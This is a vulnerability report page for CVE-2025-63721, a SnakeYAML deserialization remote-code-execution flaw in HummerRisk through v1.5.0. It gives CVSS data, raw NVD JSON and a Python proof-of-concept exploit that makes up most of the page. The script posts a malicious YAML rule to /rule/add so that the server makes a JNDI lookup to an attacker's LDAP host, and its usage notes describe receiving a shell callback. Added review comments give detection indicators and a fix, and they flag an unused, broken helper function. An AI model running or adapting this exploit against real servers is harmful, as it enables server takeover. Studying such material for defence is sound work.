Security Vulnerability Report
CVE-2025-63721 CVSS 8.8 HIGH

CVE-2025-63721

Published: 2025-12-08 17:16:20
Last Modified: 2025-12-11 15:15:49

Description

HummerRisk through v1.5.0 uses a vulnerable SnakeYAML component, allowing attackers with normal user privileges to reach the /rule/add API and thereby achieve RCE and take over the server.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hummerrisk:hummerrisk:*:*:*:*:*:*:*:* - VULNERABLE
HummerRisk < 1.5.1
HummerRisk v1.5.0
HummerRisk v1.5.0及之前所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63721 PoC - HummerRisk Snakeyaml RCE
# Target: HummerRisk <= v1.5.0
# Endpoint: POST /rule/add
#
# Reviewer notes (defensive reading of this PoC):
#   - The observable request is a form-encoded POST to /rule/add whose
#     `ruleContent` field carries YAML containing the
#     `!!javax.naming.InitialContext` tag. That tag inside a rule body is the
#     application-/WAF-side indicator; an outbound LDAP connection from the
#     application server to an arbitrary host (port 1389 in this script) is
#     the network-side indicator.
#   - The page lists HummerRisk versions < 1.5.1 as affected; beyond the vendor
#     update, SnakeYAML should parse untrusted input with SafeConstructor
#     rather than the default constructor, which honours arbitrary `!!` tags.
#   - The script as shown has been reflowed from a single collapsed line; the
#     triple-quoted YAML strings are kept exactly as they appear on the page.
import requests
import argparse
import base64
from urllib.parse import quote  # NOTE(review): imported but never used below


def generate_yaml_payload(cmd):
    """
    Generate malicious YAML payload for Snakeyaml deserialization
    This exploits JNDI injection via javax.naming.InitialContext

    NOTE(review): this helper is never called by the script. It also
    references `attacker_ip`, which is neither a parameter nor a
    module-level name here, and `jndi_url` is assigned but never used.
    """
    # The attacker-controlled LDAP server address
    jndi_url = f"ldap://{attacker_ip}:1389/Exploit"
    # Malicious YAML payload using Snakeyaml tag
    payload = f""" !!javax.naming.InitialContext !!jdk.nashorn.internal.objects.NativeString cka: !!binary | {base64.b64encode(cmd.encode()).decode()} """
    return payload


def exploit(target_url, attacker_ip, attacker_port=1389):
    """
    Exploit CVE-2025-63721

    Args:
        target_url: Base URL of vulnerable HummerRisk instance
        attacker_ip: Attacker's IP for LDAP callback
        attacker_port: LDAP server port (default: 1389)

    Returns:
        None. Progress and a 200-character prefix of the HTTP response are
        printed to stdout; a requests.RequestException is caught and
        printed rather than raised.
    """
    # Construct JNDI reference for LDAP injection
    jndi_payload = f"${{jndi:ldap://{attacker_ip}:{attacker_port}/Exploit}}"
    # Malicious YAML that triggers Snakeyaml deserialization
    yaml_payload = f""" !!javax.naming.InitialContext !!java.lang.String data: !!binary | {base64.b64encode(jndi_payload.encode()).decode()} """
    # Target API endpoint
    endpoint = f"{target_url.rstrip('/')}/rule/add"
    # HTTP Headers
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    # Request body with malicious YAML
    # Detection note: the fixed `ruleName` / `ruleType` values and the YAML
    # tags in `ruleContent` are the fields a request-log or WAF rule can key on.
    data = {
        'ruleContent': yaml_payload,
        'ruleName': 'malicious_rule',
        'ruleType': 'custom'
    }
    print(f"[*] Targeting: {endpoint}")
    print(f"[*] LDAP Server: {attacker_ip}:{attacker_port}")
    print(f"[*] Sending malicious payload...")
    try:
        response = requests.post(endpoint, data=data, headers=headers, timeout=10)
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response: {response.text[:200]}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-63721 Exploit')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-i', '--ip', required=True, help='Attacker IP for LDAP callback')
    parser.add_argument('-p', '--port', default=1389, type=int, help='LDAP port')
    args = parser.parse_args()
    exploit(args.target, args.ip, args.port)

# Usage:
# 1. Start JNDIExploit or marshalsec LDAP server on attacker machine
# 2. Run: python cve-2025-63721.py -t http://target:8080 -i attacker_ip -p 1389
# 3. Receive shell callback on LDAP server

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63721", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:20.230", "lastModified": "2025-12-11T15:15:49.320", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "HummerRisk thru v1.5.0 is using a vulnerable Snakeyaml component, allowing attackers with normal user privileges to hit the /rule/add API and thereby achieve RCE and take over the server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hummerrisk:hummerrisk:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.5.0", "matchCriteriaId": "9BAA1F0C-C093-44BC-B790-BD0FB41BE3A1"}]}]}], "references": [{"url": 
"https://gist.github.com/k1ng0fic3/e8c8c9353fff8fa95e2c2952587e9266", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/k1ng0fic3/secrisk/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gist.github.com/k1ng0fic3/e8c8c9353fff8fa95e2c2952587e9266", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/k1ng0fic3/secrisk/blob/main/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}